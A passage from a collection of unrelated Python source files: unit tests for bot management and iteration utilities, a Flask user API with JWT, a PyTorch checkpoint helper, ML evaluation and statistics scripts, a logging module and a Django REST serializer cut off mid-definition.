version=hashlib.sha256().hexdigest(), quarantined=True, task_id=None,
task_name=None)
# Assert that BotInfo was updated too.
expected = {
'authenticated_as': u'bot:id1.domain',
'composite': [32, 4, 2],
'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
'external_ip': u'8.8.4.4',
'first_seen_ts': now,
'id': 'id1',
'last_seen_ts': now,
'lease_id': None,
'lease_expiration_ts': None,
'machine_type': None,
'quarantined': True,
'state': {u'ram': 65},
'task_id': None,
'task_name': None,
'version': _VERSION,
}
bot_info = bot_management.get_info_key('id1').get()
self.assertEqual(expected, bot_info.to_dict())
# No BotEvent is registered for 'poll'.
self.assertEqual([], bot_management.get_events_query('id1', True).fetch())
def test_bot_event_busy(self):
now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
self.mock_now(now)
bot_management.bot_event(
event_type='request_task', bot_id='id1',
external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
version=hashlib.sha256().hexdigest(), quarantined=False,
task_id='12311', task_name='yo')
expected = {
'authenticated_as': u'bot:id1.domain',
'composite': [32, 8, 1],
'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
'external_ip': u'8.8.4.4',
'first_seen_ts': now,
'id': 'id1',
'last_seen_ts': now,
'lease_id': None,
'lease_expiration_ts': None,
'machine_type': None,
'quarantined': False,
'state': {u'ram': 65},
'task_id': u'12311',
'task_name': u'yo',
'version': _VERSION,
}
bot_info = bot_management.get_info_key('id1').get()
self.assertEqual(expected, bot_info.to_dict())
expected = [
{
'authenticated_as': u'bot:id1.domain',
'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
'event_type': u'request_task',
'external_ip': u'8.8.4.4',
'lease_id': None,
'lease_expiration_ts': None,
'machine_type': None,
'message': None,
'quarantined': False,
'state': {u'ram': 65},
'task_id': u'12311',
'ts': now,
'version': _VERSION,
},
]
self.assertEqual(
expected,
[e.to_dict() for e in bot_management.get_events_query('id1', True)])
def test_should_restart_bot_not_set(self):
state = {
'running_time': 0,
'started_ts': 1410989556.174,
}
self.assertEqual(
(False, ''), bot_management.should_restart_bot('id', state))
def test_should_restart_bot_bad_type(self):
state = {
'periodic_reboot_secs': '100',
'running_time': 105,
'started_ts': 1410989556.174,
}
self.assertEqual(
(False, ''), bot_management.should_restart_bot('id', state))
def test_should_restart_bot_no(self):
state = {
'periodic_reboot_secs': 100,
'running_time': 0,
'started_ts': 1410989556.174,
}
self.assertEqual(
(False, ''), bot_management.should_restart_bot('id', state))
def test_should_restart_bot(self):
state = {
'periodic_reboot_secs': 100,
'running_time': 107, # Affected by BOT_REBOOT_PERIOD_RANDOMIZATION_MARGIN
'started_ts': 1410989556.174,
}
needs_reboot, message = bot_management.should_restart_bot('id', state)
self.assertTrue(needs_reboot)
self.assertTrue(message)
def test_get_bot_reboot_period(self):
# Mostly for code coverage.
self.mock(bot_management, 'BOT_REBOOT_PERIOD_RANDOMIZATION_MARGIN', 0.1)
state = {'periodic_reboot_secs': 1000, 'started_ts': 1234}
self.assertEqual(980, bot_management.get_bot_reboot_period('bot', state))
# Make sure the margin is respected.
periods = set()
for i in xrange(0, 1350):
state = {'periodic_reboot_secs': 1000, 'started_ts': i}
period = bot_management.get_bot_reboot_period('bot', state)
self.assertTrue(900 <= period < 1100)
periods.add(period)
# Make sure it's really random and covers all expected range. (This check
# relies on number of iterations above to be high enough).
self.assertEqual(200, len(periods))
def test_get_info_key(self):
self.assertEqual(
ndb.Key(bot_management.BotRoot, 'foo', bot_management.BotInfo, 'info'),
bot_management.get_info_key('foo'))
def test_get_root_key(self):
self.assertEqual(
ndb.Key(bot_management.BotRoot, 'foo'),
bot_management.get_root_key('foo'))
def test_get_settings_key(self):
expected = ndb.Key(
bot_management.BotRoot, 'foo', bot_management.BotSettings, 'settings')
self.assertEqual(expected, bot_management.get_settings_key('foo'))
def test_filter_dimensions(self):
pass # Tested in handlers_endpoints_test
def test_filter_availability(self):
pass # Tested in handlers_endpoints_test
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG if '-v' in sys.argv else logging.ERROR)
unittest.main()
| StarcoderdataPython |
5113341 | <reponame>vlievin/ovis
import os
import torch
class Session():
"""a small class to ease checkpointing and restoring"""
best_elbo = (-1e20, 0, 0)
global_step = 0
epoch = 0
filename = "session.tar"
def __init__(self, run_id, logdir, model, estimator, optimizers):
self.run_id = run_id
self.logdir = logdir
self.model = model
self.estimator = estimator
self.optimizers = optimizers
def state_dict(self):
return {
'best_elbo': self.best_elbo,
'global_step': self.global_step,
'epoch': self.epoch,
'run_id': self.run_id,
'model': self.model.state_dict(),
'estimator': self.estimator.state_dict(),
**{self.opt_id(k): o.state_dict() for k, o in enumerate(self.optimizers)}
}
@staticmethod
def opt_id(k):
return f"optimizer_{k + 1}"
@property
def path(self):
return os.path.join(self.logdir, self.filename)
def save(self):
torch.save(self.state_dict(), self.path)
def load(self):
device = next(iter(self.model.parameters())).device
checkpoint = torch.load(self.path, map_location=device)
assert self.run_id == checkpoint['run_id']
self.best_elbo = checkpoint['best_elbo']
self.global_step = checkpoint['global_step']
self.epoch = checkpoint['epoch']
self.model.load_state_dict(checkpoint['model'])
self.estimator.load_state_dict(checkpoint['estimator'])
for k, o in enumerate(self.optimizers):
o.load_state_dict(checkpoint[self.opt_id(k)])
def restore_if_available(self):
if os.path.exists(self.path):
self.load()
| StarcoderdataPython |
6614256 | <gh_stars>0
# Licensed under Apache License Version 2.0 - see LICENSE
import pytest
from iteration_utilities import all_distinct
import helper_funcs as _hf
from helper_cls import T
def test_alldistinct_empty1():
assert all_distinct([])
def test_alldistinct_normal1():
assert all_distinct([T(1), T(2), T(3)])
def test_alldistinct_normal2():
assert not all_distinct([T(1), T(1), T(1)])
def test_alldistinct_normal3():
# generator
assert all_distinct((i for i in [T(1), T(2), T(3)]))
def test_alldistinct_unhashable1():
assert all_distinct([{T('a'): T(1)}, {T('a'): T(2)}])
def test_alldistinct_unhashable2():
assert not all_distinct([{T('a'): T(1)}, {T('a'): T(1)}])
def test_alldistinct_failure1():
with pytest.raises(_hf.FailIter.EXC_TYP, match= _hf.FailIter.EXC_MSG):
all_distinct(_hf.FailIter())
def test_alldistinct_failure2():
# Test that a failing iterator doesn't raise a SystemError
with pytest.raises(_hf.FailNext.EXC_TYP, match=_hf.FailNext.EXC_MSG):
all_distinct(_hf.FailNext())
def test_alldistinct_failure3():
# Failure when comparing the object to the objects in the list
with pytest.raises(_hf.FailEqNoHash.EXC_TYP, match=_hf.FailEqNoHash.EXC_MSG):
all_distinct([[T(1)], _hf.FailEqNoHash()])
def test_alldistinct_failure4():
# Failure (no TypeError) when trying to hash the value
with pytest.raises(_hf.FailHash.EXC_TYP, match=_hf.FailHash.EXC_MSG):
all_distinct([T(1), _hf.FailHash()])
@_hf.skip_on_pypy_because_cache_next_works_differently
def test_alldistinct_failure5():
# Changing next method
with pytest.raises(_hf.CacheNext.EXC_TYP, match=_hf.CacheNext.EXC_MSG):
all_distinct(_hf.CacheNext(1))
| StarcoderdataPython |
1662194 | <gh_stars>1-10
from flask import Blueprint, flash, g, request, jsonify
from flaskr.db import get_db
from werkzeug.security import check_password_hash, generate_password_hash
from sqlite3 import Error as SQLiteError
from jwt import DecodeError, encode as jwt_encode, decode as jwt_decode, ExpiredSignatureError
from functools import wraps
valid_body_keys = ("username", "password", "<PASSWORD>")
def user_by_username(username):
"""Helper function that returns a user based in their username. If user not exists will return none"""
db = get_db()
user = db.execute(
'SELECT id, username, password FROM user WHERE username = ?', (username,)
).fetchone()
return user
def token_required(app):
def token_required_decorator(f):
@wraps(f)
def decorated(*args, **kwargs):
token = request.headers.get('Authentication')
if not token:
return jsonify({'message': 'token is missing on request', 'data': []}), 401
try:
data = jwt_decode(token, app.config['SECRET_KEY'],algorithms="HS256")
current_user = user_by_username(username=data['username'])
except DecodeError:
return jsonify({'message': 'token is invalid or expired', 'data': []}), 401
except ExpiredSignatureError:
return jsonify({'message': 'token is expired', 'data': []}), 401
return f(current_user, *args, **kwargs)
return decorated
return token_required_decorator
def construct_blueprint(app):
bp = Blueprint('user', __name__, url_prefix='/user')
query_user_by_id = 'SELECT id, username, password FROM user WHERE id = ?'
message_user_not_found = 'user not found'
message_unexpected_error = 'that occurred an error during user registration'
@bp.route('/<int:id>', methods=['PUT'])
def update_user(id):
db = get_db()
request_body = request.get_json()
if request.is_json and all (k in valid_body_keys[:-1] for k in request_body):
username, password = request_body['username'], request_body['password']
user = db.execute(
query_user_by_id, (id,)
).fetchone()
if user is None:
return jsonify({'message': message_user_not_found}), 404
if user_by_username(username) is not None:
return jsonify({'message': 'provided username already registered'}), 409
try:
db.execute(
'UPDATE user SET username = ?, password = ? WHERE id = ?',
(username, generate_password_hash(password), id)
)
db.commit()
return jsonify({'message': f'user {username} was successfully updated', 'data': {'id': user['id'], 'username': username}}), 200
except SQLiteError:
return jsonify({'message': message_unexpected_error}), 500
return jsonify({'message': 'invalid request provided'}), 403
@bp.route('/<int:id>', methods=['DELETE'])
@token_required(app)
def delete_user(id):
db = get_db()
user = db.execute(
query_user_by_id, (id,)
).fetchone()
if user is None:
return jsonify({'message': message_user_not_found}), 404
try:
db.execute('DELETE FROM panel_card WHERE panel_id = (SELECT id FROM panel where user_id = ?)', (id,))
db.commit()
db.execute('DELETE FROM panel WHERE user_id = ?', (id,))
db.commit()
db.execute('DELETE FROM user WHERE id = ?', (id,))
db.commit()
return jsonify({'message': f'user was successfully deleted'}), 200
except SQLiteError:
return jsonify({'message': message_unexpected_error}), 500
@bp.route('/', methods=['POST'])
def register_user():
request_body = request.get_json()
if request.is_json and all (k in valid_body_keys for k in request_body):
username, password, confirm_password = request_body['username'], request_body['password'], request_body['confirm_password']
db = get_db()
user = user_by_username(username)
if user is not None:
return jsonify({'message': 'provided username already exists'}), 409
if password != confirm_password:
return jsonify({'message': 'provided passwords doesn\'t match'}), 401
try:
db.execute(
'INSERT INTO user (username, password) VALUES (?, ?)',
(username, generate_password_hash(password))
)
db.commit()
newuser = user_by_username(username)
return jsonify({'message': f'user {username} was successfully registered', 'data': {'id': newuser['id'], 'username': newuser['username']}}), 200
except SQLiteError:
return jsonify({'message': message_unexpected_error}), 500
return jsonify({'message': 'invalid request provided'}), 403
@bp.route('/<int:id>', methods=['GET'])
@token_required(app)
def get_user(current_user,id):
db = get_db()
user = db.execute(query_user_by_id, (id,)).fetchone()
if user is None:
return jsonify({'message': message_user_not_found}), 404
return jsonify({'data': {'id': user['id'],'username': user['username']}})
@bp.route('/list', methods=['GET'])
@token_required(app)
def list_users(current_user):
db = get_db()
users = db.execute('SELECT id, username, password FROM user')
return jsonify({'data': [{
'id': user['id'],
'username': user['username']
} for user in users]})
return bp | StarcoderdataPython |
1697225 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import sys
import argparse
from _test_commons import run_subprocess
import logging
logging.basicConfig(format="%(asctime)s %(name)s [%(levelname)s] - %(message)s", level=logging.DEBUG)
log = logging.getLogger("ORTModuleDistributedTests")
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("--cwd", help="Path to the current working directory")
parser.add_argument("--mnist", help="Path to the mnist data directory", type=str, default=None)
return parser.parse_args()
def run_ortmodule_deepspeed_zero_stage_1_tests(cwd, log, data_dir):
log.debug("Running: ORTModule deepspeed zero stage 1 tests")
command = [
"deepspeed",
"orttraining_test_ortmodule_deepspeed_zero_stage_1.py",
"--deepspeed_config",
"orttraining_test_ortmodule_deepspeed_zero_stage_1_config.json",
]
if data_dir:
command.extend(["--data-dir", data_dir])
run_subprocess(command, cwd=cwd, log=log).check_returncode()
def run_pytorch_ddp_tests(cwd, log):
log.debug("Running: ORTModule Pytorch DDP tests")
command = [sys.executable, "orttraining_test_ortmodule_pytorch_ddp.py", "--use_ort_module"]
run_subprocess(command, cwd=cwd, log=log).check_returncode()
def run_ortmodule_deepspeed_pipeline_parallel_tests(cwd, log):
log.debug("Running: ORTModule deepspeed pipeline parallel tests")
command = [
"deepspeed",
"orttraining_test_ortmodule_deepspeed_pipeline_parallel.py",
"--deepspeed_config",
"orttraining_test_ortmodule_deepspeed_pipeline_parallel_config.json",
]
run_subprocess(command, cwd=cwd, log=log).check_returncode()
def run_ortmodule_fairscale_sharded_optimizer_tests(cwd, log, data_dir):
log.debug("Running: ORTModule fairscale sharded optimizer tests")
command = [
"python3",
"orttraining_test_ortmodule_fairscale_sharded_optimizer.py",
"--use_sharded_optimizer",
"--use_ortmodule",
]
if data_dir:
command.extend(["--data-dir", data_dir])
run_subprocess(command, cwd=cwd, log=log).check_returncode()
def main():
args = parse_arguments()
cwd = args.cwd
log.info("Running ortmodule tests pipeline")
run_pytorch_ddp_tests(cwd, log)
run_ortmodule_deepspeed_zero_stage_1_tests(cwd, log, args.mnist)
run_ortmodule_deepspeed_pipeline_parallel_tests(cwd, log)
run_ortmodule_fairscale_sharded_optimizer_tests(cwd, log, args.mnist)
return 0
if __name__ == "__main__":
sys.exit(main())
| StarcoderdataPython |
9695416 | from django.shortcuts import render
from django.views.generic import ListView, DetailView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from .models import BlogPost
class BlogListView(ListView):
model = BlogPost
template_name = 'blogs.html'
context_object_name = 'blogs'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(BlogListView, self).get_context_data(*kwargs)
blogs = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(blogs, self.paginate_by)
try:
blogs = paginator.page(page)
except PageNotAnInteger:
blogs = paginator.page(1)
except EmptyPage:
blogs = paginator.page(paginator.num_pages)
context['blogs'] = blogs
return context
class BlogDetailView(DetailView):
model = BlogPost
template_name = "blogpost.html"
context_object_name = 'blog' | StarcoderdataPython |
1712943 | <filename>scripts/test.py
# MSRA Internal Graphics
#
"""
Examples:
"""
import os
import h5py
import numpy as np
import tensorflow as tf
import models
from scripts import dataset
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def eval_phase_network(net, reader):
data, _ = net.cook_raw_inputs(reader)
instance_network = net(False, False)
logit = instance_network.instance(data)
softmax_logit = tf.nn.softmax(logit, name='softmax')
_, predict = tf.nn.top_k(softmax_logit, name='seg_label')
return predict, softmax_logit
def eval_network(args):
# network choice
net = models.NETWORK[args.input_network]
# data reader
data_dir = args.input_training_data_path
data_records = [item for item in os.listdir(data_dir) if item.endswith('.tfrecord')]
test_records = [os.path.join(data_dir, item) for item in data_records if item.find('test') != -1]
num_samples = sum(1 for _ in tf.python_io.tf_record_iterator(test_records[0]))
reader = dataset.SceneReader(test_records)
outputs = eval_phase_network(net, reader)
config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)
with tf.Session(config=config) as sess:
init = tf.global_variables_initializer()
sess.run(init)
saver = tf.train.Saver()
if os.path.isdir(args.output_model_path):
model_choice = tf.train.latest_checkpoint(args.output_model_path)
else:
model_choice = args.output_model_path
saver.restore(sess, model_choice)
print('start evaluate model: %s' % model_choice)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
predict_tensor = []
for sample in range(num_samples):
[predict, logit] = [np.squeeze(item) for item in sess.run(outputs)]
# print('run iteration: %03d' % sample)
if args.eval_platform == 'fusion':
predict_tensor.append(np.array(predict))
else:
predict_tensor.append(np.array(logit))
# finished training
coord.request_stop()
coord.join(threads)
predict_tensor = np.stack(predict_tensor, axis=0)
print(predict_tensor.shape)
if not args.eval_platform == 'fusion':
predict_tensor = np.swapaxes(predict_tensor, -1, 1)
predict_tensor = np.swapaxes(predict_tensor, -1, 2)
predict_tensor = np.swapaxes(predict_tensor, -1, 3)
if not os.path.exists(args.eval_results):
os.mkdir(args.eval_results)
file_name = '.'.join((os.path.split(model_choice)[1].split('.')[0], 'hdf5'))
fp = h5py.File(os.path.join(args.eval_results, file_name), 'w')
result = fp.create_dataset('result', predict_tensor.shape, dtype='f')
result[...] = predict_tensor
fp.close()
return
| StarcoderdataPython |
8161825 | <filename>Workspace.py
import os
import pickle
CodeDir="/home/mrware/Dropbox/Code/NYTimes API"
WorkspaceObjects=[]
def save_obj(obj, name ):
folder=CodeDir+'/obj/'
if not os.path.isdir(folder):
os.makedirs(folder)
with open(folder + name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name ):
folder=CodeDir+'/obj/'
try:
with open(folder + name + '.pkl', 'rb') as f:
print name+" remembered!"
return pickle.load(f)
except IOError:
if not os.path.isdir(folder):
os.makedirs(folder)
save_obj({},name)
return {}
def det_fn_name(fn ):
idx1=str(fn).index('at')
idx0=str(fn).index(' ')
return str.strip(str(fn)[idx0:idx1])
def save_workspace():
for obj in WorkspaceObjects:
print "Saving %s ..." % obj
globals()[obj].make_memory()
print "Done!"
def clear_workspace():
for obj in WorkspaceObjects:
print "Clearing %s ..." % obj
globals()[obj].forget()
print "Done!"
def clean_slate():
for obj in WorkspaceObjects:
print "Clearing %s ..." % obj
globals()[obj].forget()
print "Done!"
| StarcoderdataPython |
8043247 |
from numba import jit,vectorize,njit
import numpy as np
import functools as fc
import os
import time
from tqdm.notebook import tqdm_notebook as tqdm
# from tqdm import tqdm
# tqdm = lambda x : x
# def co_variance(X,bias=0):
# nx,i = X.shape ## X is input data matrix
# # ans = np.zeros((i,i))#,dtype=float)
# # for a in X:
# # ans += np.outer(a,a)
# ans = X.T.dot(X)
# return ans/(nx-bias)
def co_variance(x,bias=0):
return x.T.dot(x)/(x.shape[0]-bias)
co_variance.name = "co_variance" ## Abuse of function notations
def ex_variance(cm):
i,_ = cm.shape
fv = np.outer(cm,cm)
return fv.reshape(i,i**3)
def ra_kurtosis(X,bias=0):
nx,i = X.shape
ans = np.zeros((i**3,i))
looper = tqdm(X)
for a in looper:
ans += np.outer(np.outer(np.outer(a,a),a),a)
return ans.T/(nx-bias)
ra_kurtosis.name="Raw_kurtosis"
def co_kurtosis(rand_mat,bias=0):
ck = ra_kurtosis(rand_mat,bias)
cm = co_variance(rand_mat,1) #UNBIASED est
ev = ex_variance(cm)
return ck- 3*ev
co_kurtosis.name = "co_kurtosis"
@jit
def val_substraction(CK,CV):
nvar = CV.shape[-1]
for i in range(nvar):
for j in range(nvar):
for k in range(nvar):
for l in range(nvar):
CK[i,j,k,l] = (CK[i,j,k,l] - CV[i,j]*CV[k,l] - CV[i,k]*CV[j,l] - CV[i,l]*CV[j,k])
return CK
# def outer_Variance()
def val_kurtosis(xscaled):
n,nvar = xscaled.shape
CK = ra_kurtosis(xscaled).reshape(nvar,nvar,nvar,nvar)
CV= co_variance(xscaled)
CK = val_substraction(CK,CV)
CK_m = CK.reshape(nvar, nvar*nvar*nvar)
return CK_m
val_kurtosis.name="val_kurtosis"
## -------------------------------------------------------------------------
### Following function isued for testing accuracy with index definitio of kurtosis
### Warning-~very slow execution without numba jit
@jit
def ex_kurtosis(u):
nx,nv = u.shape
mom = np.zeros((nv, nv))#, dtype=float, order='F')
# compute covariance matrix
for j in range(nv):
for i in range(nv):
for n in range(nx):
mom[i,j] = mom[i,j] + u[n,i] * u[n,j]
mom2 = mom/nx
tmp = np.zeros((nv,nv,nv,nv))#, dtype=float, order='F')
# compute cokurtosis matrix
for l in range(nv):
for k in range(nv):
for j in range(nv):
for i in range(nv):
for n in range(nx):
tmp[i,j,k,l] = tmp[i,j,k,l] + u[n,i] * u[n,j] * u[n,k] * u[n,l]
tmp=tmp/nx
for l in range(nv):
for k in range(nv):
for j in range(nv):
for i in range(nv):
tmp[i,j,k,l] = tmp[i,j,k,l] - mom2[i,j]*mom2[k,l] - mom2[i,k]*mom2[j,l] - mom2[i,l]*mom2[j,k]
return tmp.reshape(nv,nv**3)
ex_kurtosis.name="For loop kurtosis"
| StarcoderdataPython |
1610509 | from __future__ import absolute_import, unicode_literals
import logging
import logging.config
import logging.handlers
import platform
LOG_LEVELS = {
-1: dict(root=logging.ERROR, mopidy=logging.WARNING),
0: dict(root=logging.ERROR, mopidy=logging.INFO),
1: dict(root=logging.WARNING, mopidy=logging.DEBUG),
2: dict(root=logging.INFO, mopidy=logging.DEBUG),
3: dict(root=logging.DEBUG, mopidy=logging.DEBUG),
4: dict(root=logging.NOTSET, mopidy=logging.NOTSET),
}
# Custom log level which has even lower priority than DEBUG
TRACE_LOG_LEVEL = 5
logging.addLevelName(TRACE_LOG_LEVEL, 'TRACE')
class DelayedHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
self._released = False
self._buffer = []
def handle(self, record):
if not self._released:
self._buffer.append(record)
def release(self):
self._released = True
root = logging.getLogger('')
while self._buffer:
root.handle(self._buffer.pop(0))
_delayed_handler = DelayedHandler()
def bootstrap_delayed_logging():
root = logging.getLogger('')
root.setLevel(logging.NOTSET)
root.addHandler(_delayed_handler)
def setup_logging(config, verbosity_level, save_debug_log):
logging.captureWarnings(True)
if config['logging']['config_file']:
# Logging config from file must be read before other handlers are
# added. If not, the other handlers will have no effect.
logging.config.fileConfig(config['logging']['config_file'],
disable_existing_loggers=False)
setup_console_logging(config, verbosity_level)
if save_debug_log:
setup_debug_logging_to_file(config)
_delayed_handler.release()
def setup_console_logging(config, verbosity_level):
if verbosity_level < min(LOG_LEVELS.keys()):
verbosity_level = min(LOG_LEVELS.keys())
if verbosity_level > max(LOG_LEVELS.keys()):
verbosity_level = max(LOG_LEVELS.keys())
loglevels = config.get('loglevels', {})
has_debug_loglevels = any([
level < logging.INFO for level in loglevels.values()])
verbosity_filter = VerbosityFilter(verbosity_level, loglevels)
if verbosity_level < 1 and not has_debug_loglevels:
log_format = config['logging']['console_format']
else:
log_format = config['logging']['debug_format']
formatter = logging.Formatter(log_format)
if config['logging']['color']:
handler = ColorizingStreamHandler(config.get('logcolors', {}))
else:
handler = logging.StreamHandler()
handler.addFilter(verbosity_filter)
handler.setFormatter(formatter)
logging.getLogger('').addHandler(handler)
def setup_debug_logging_to_file(config):
formatter = logging.Formatter(config['logging']['debug_format'])
handler = logging.handlers.RotatingFileHandler(
config['logging']['debug_file'], maxBytes=10485760, backupCount=3)
handler.setFormatter(formatter)
logging.getLogger('').addHandler(handler)
class VerbosityFilter(logging.Filter):
def __init__(self, verbosity_level, loglevels):
self.verbosity_level = verbosity_level
self.loglevels = loglevels
def filter(self, record):
for name, required_log_level in self.loglevels.items():
if record.name == name or record.name.startswith(name + '.'):
return record.levelno >= required_log_level
if record.name.startswith('mopidy'):
required_log_level = LOG_LEVELS[self.verbosity_level]['mopidy']
else:
required_log_level = LOG_LEVELS[self.verbosity_level]['root']
return record.levelno >= required_log_level
#: Available log colors.
COLORS = [b'black', b'red', b'green', b'yellow', b'blue', b'magenta', b'cyan',
b'white']
class ColorizingStreamHandler(logging.StreamHandler):
"""
Stream handler which colorizes the log using ANSI escape sequences.
Does nothing on Windows, which doesn't support ANSI escape sequences.
This implementation is based upon https://gist.github.com/vsajip/758430,
which is:
Copyright (C) 2010-2012 <NAME>. All rights reserved.
Licensed under the new BSD license.
"""
# Map logging levels to (background, foreground, bold/intense)
level_map = {
TRACE_LOG_LEVEL: (None, 'blue', False),
logging.DEBUG: (None, 'blue', False),
logging.INFO: (None, 'white', False),
logging.WARNING: (None, 'yellow', False),
logging.ERROR: (None, 'red', False),
logging.CRITICAL: ('red', 'white', True),
}
# Map logger name to foreground colors
logger_map = {}
csi = '\x1b['
reset = '\x1b[0m'
is_windows = platform.system() == 'Windows'
def __init__(self, logger_colors):
super(ColorizingStreamHandler, self).__init__()
self.logger_map = logger_colors
@property
def is_tty(self):
isatty = getattr(self.stream, 'isatty', None)
return isatty and isatty()
def emit(self, record):
try:
message = self.format(record)
self.stream.write(message)
self.stream.write(getattr(self, 'terminator', '\n'))
self.flush()
except Exception:
self.handleError(record)
def format(self, record):
message = logging.StreamHandler.format(self, record)
if not self.is_tty or self.is_windows:
return message
for name, color in self.logger_map.iteritems():
if record.name.startswith(name):
return self.colorize(message, fg=color)
if record.levelno in self.level_map:
bg, fg, bold = self.level_map[record.levelno]
return self.colorize(message, bg=bg, fg=fg, bold=bold)
return message
def colorize(self, message, bg=None, fg=None, bold=False):
params = []
if bg in COLORS:
params.append(str(COLORS.index(bg) + 40))
if fg in COLORS:
params.append(str(COLORS.index(fg) + 30))
if bold:
params.append('1')
if params:
message = ''.join((
self.csi, ';'.join(params), 'm', message, self.reset))
return message
| StarcoderdataPython |
8074640 | #===========================================================================================================================
# aims : This script takes the frame file in input and gives it back adding the context to each frame
#
# input : input_filepath : folder containing subjects' cepstra. It takes the subject_path set in 1_main_process_subjects.py
#
# output_filepath: folder where it writes back the cepstra with context
# Nframes: number of context frames added to both sides of each single frame. It takes the ctx_frames set in 1_main_process_subjects.py
#
# return : void
#===========================================================================================================================
import os
import re
import numpy as np
from numpy import genfromtxt
from . import utilities
def create_context_file(input_filepath, output_filepath, Nframes):
f = open(input_filepath, 'rb')
lines = f.readlines()
count_lines = len(lines) # str(len(lines))
ctx_file = open(output_filepath, "wb")
# TEST DATASET
startSent = 0 # start line command
endSent = int(count_lines) -1 # end line command
data = genfromtxt(input_filepath)
Newdata = np.zeros([data.shape[0], data.shape[1] * ((2 * Nframes) + 1)])
indexData1 = startSent
indexData2 = endSent
# first frame of the statement:
Newdata[indexData1, :] = np.concatenate((np.tile(data[indexData1, :], Nframes + 1),
data[indexData1 + 1:indexData1 + Nframes + 1, :].reshape(
data.shape[1] * Nframes)))
indexData1 += 1
# second frame of the statement:
Newdata[indexData1, :] = np.concatenate((np.tile(data[startSent, :], Nframes), data[indexData1, :],
data[indexData1 + 1:indexData1 + Nframes + 1, :].reshape(
data.shape[1] * Nframes)))
indexData1 += 1
# from 3th frame to the Nframesth frame:
while indexData1 < Nframes:
diff1 = indexData1
DummyFramesL = np.concatenate((np.tile(data[startSent, :], Nframes - diff1 + 1),
data[indexData1 - diff1 + 1:indexData1, :].reshape(data.shape[1] * (diff1 - 1))))
Newdata[indexData1, :] = np.concatenate((DummyFramesL, data[indexData1, :],
data[indexData1 + 1:indexData1 + Nframes + 1, :].reshape(
data.shape[1] * Nframes)))
indexData1 += 1
# central frames :
for index in range(indexData1, indexData2 - Nframes):
Newdata[index, :] = data[max(0, index - Nframes - 1 + 1): index + Nframes + 1, :].reshape(
data.shape[1] * ((2 * Nframes) + 1))
# last frame of the statement :
Newdata[indexData2, :] = np.concatenate((data[indexData2 - Nframes:indexData2, :].reshape(data.shape[1] * Nframes),
np.tile(data[indexData2, :], Nframes + 1)))
indexData2 -= 1
# penultimate frame of the statement :
Newdata[indexData2, :] = np.concatenate((data[indexData2 - Nframes:indexData2, :].reshape(data.shape[1] * Nframes),
data[indexData2, :], np.tile(data[indexData2 + 1, :], Nframes)))
indexData2 -= 1
# frames in [-Nframes, penultimate]:
while endSent - indexData2 < Nframes:
diff2 = endSent - indexData2
DummyFramesR = np.concatenate((data[indexData2 + 1:endSent, :].reshape(data.shape[1] * (diff2 - 1)),
np.tile(data[endSent, :], Nframes - diff2 + 1)))
Newdata[indexData2, :] = np.concatenate(
(data[indexData2 - Nframes:indexData2, :].reshape(data.shape[1] * Nframes), data[indexData2, :], DummyFramesR))
indexData2 -= 1
np.savetxt(ctx_file, Newdata, fmt='%.4f')
def createSubjectContext(subject_path, ctx_frames):
for f in os.listdir(subject_path):
if f.endswith(".dat") and not f.startswith("ctx"):
original_file_path = subject_path + "/" + f
ctx_file_path = subject_path + "/" + 'ctx_' + f
#print(f)
create_context_file(original_file_path, ctx_file_path, ctx_frames)
print("subject context created")
| StarcoderdataPython |
1766157 | #When users post an update on social media,such as a URL, image, status update etc., other users in their network are able to view this new post on their news feed. Users can also see exactly when the post was published, i.e, how many hours, minutes or seconds ago.
#Since sometimes posts are published and viewed in different time zones, this can be confusing. You are given two timestamps of one such post that a user can see on his newsfeed in the following format:
#Day dd Mon yyyy hh:mm:ss +xxxx
#Here +xxxx represents the time zone. Your task is to print the absolute difference (in seconds) between them.
#Input Format
#The first line contains T, the number of testcases.
#Each testcase contains 2 lines, representing time t1 and t2 time.
#Constraints
#Input contains only valid timestamps
#year <= 3000
#Output Format :
#Print the absolute difference (t1 and t2) in seconds.
#Sample Input 0
#2
#Sun 10 May 2015 13:54:36 -0700
#Sun 10 May 2015 13:54:36 -0000
#Sat 02 May 2015 19:54:36 +0530
#Fri 01 May 2015 13:54:36 -0000
#Sample Output 0
#25200
#88200
#Explanation 0
#In the first query, when we compare the time in UTC for both the time stamps, we see a difference of 7 hours. which is 7 * 3600 seconds or 25200 seconds
#Similarly, in the second query, time difference is 5 hours and 30 minutes for time zone adjusting for that we have a difference of 1 day and 30 minutes. Or 24 * 3600 + 30 * 60 => 88200
from datetime import datetime as dt
fmt = '%a %d %b %Y %H:%M:%S %z'
for i in range(int(input())):
print(int(abs((dt.strptime(input(), fmt) -
dt.strptime(input(), fmt)).total_seconds())))
#Please directly run the code in terminal to view results. Thank You.....!!!!! | StarcoderdataPython |
1632246 | from rest_framework import serializers
from .fields import UidRelatedField
from .models import Category, Recipe
from .utils import strip_query_params, make_s3_url_https
# Handy reference for serializers: http://cdrf.co/
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = '__all__'
extra_kwargs = {
# These fields may be null in the API, we transform them to empty strings below
'parent_uid': {'allow_null': True},
}
def validate_parent_uid(self, value):
return '' if value is None else value
class RecipeSerializer(serializers.ModelSerializer):
# Recipes in Paprika API aren't updated to remove missing/deleted categories, so ignore any categories we don't know about
categories = UidRelatedField(queryset=Category.objects, many=True, ignore_missing_relation=True)
NULL_TO_EMPTY_STR_FIELDS = {
'cook_time',
'description',
'difficulty',
'directions',
'image_url',
'ingredients',
'in_trash',
'is_pinned',
'notes',
'nutritional_info',
